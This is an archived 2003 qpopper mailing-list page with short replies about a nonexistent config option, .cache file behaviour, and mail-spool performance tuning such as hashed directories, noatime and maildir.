cat /dev/null > $mailbox is usually safer than rm, especially in systems
where the mail spool directory isn't set 1777. (Some people _are_ that
paranoid)
Date: Sat, 22 Mar 2003 17:36:36 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: home-dir-misc not working in 4.0.5
On Thu, 20 Mar 2003, Brad Blix wrote:
> When I define home-dir-misc in the configuration file I get "Unable to
> process config file /etc/qpopper.conf" from the qpopper program. I have
> also tried to compile qpopper with --enable-home-dir-misc and it is
> still putting the .cache and .pop files in the default spool directory.
>
> Am I doing something wrong?
>
once again, this option does not exist in any release.
a search of this list's archives would have revealed that.
where are you getting the idea this option exists in any released version?
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
From: Mark <admin at asarian-host dot net>
Date: Fri, 21 Mar 2003 22:51:05 GMT
Subject: test, ignore
Is this mic still on? Haven't received anything in days.
Date: Tue, 18 Mar 2003 17:15:29 -0500
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: .cache problem
Quoting Narrowstream (technique at narrowstream dot net):
...
> If the mailbox is empty and the user checks it, there is a .cache file that
> is created in /var/mail/tmp.
> When a user has at least one mail in his mailbox and then download the mail,
> there is no .cache file in the directory /var/mail/tmp.
>
> Is it a bug ?
> Is there another possibility to know when do they check the mailbox ?
Ummmm... logs?
You know, those big syslogs that are generated with so much
(parsable) information. I love them. Use them all the time.
Date: Sat, 22 Mar 2003 18:13:57 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: Question about hashed directories...
On Thu, 20 Mar 2003, Tim Meader wrote:
> Regardless, I have tweaked and tweaked as much as possible, and am making a
> final change tonight. In particular I would like anyones' feedback on what
> kind of performance increase switching to hashed directories might achieve.
i couldn't give you numbers, but i'd say it'd be noticeable. assuming
you're using UFS, which searches directories linearly.
might try mounting partitions with the noatime option too? i don't
remember if qpopper cares about the last accessed time of files. could
save yourself a I/O write there.
might try using maildir, which doesn't use .pop files at all, and doesn't
write status headers, which helps I/O but will increase CPU usage a bit
(having to generate the UIDL from the each filename) (tradeoff).
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Last updated on 23 Mar 2003 by Pensive Mailing List Admin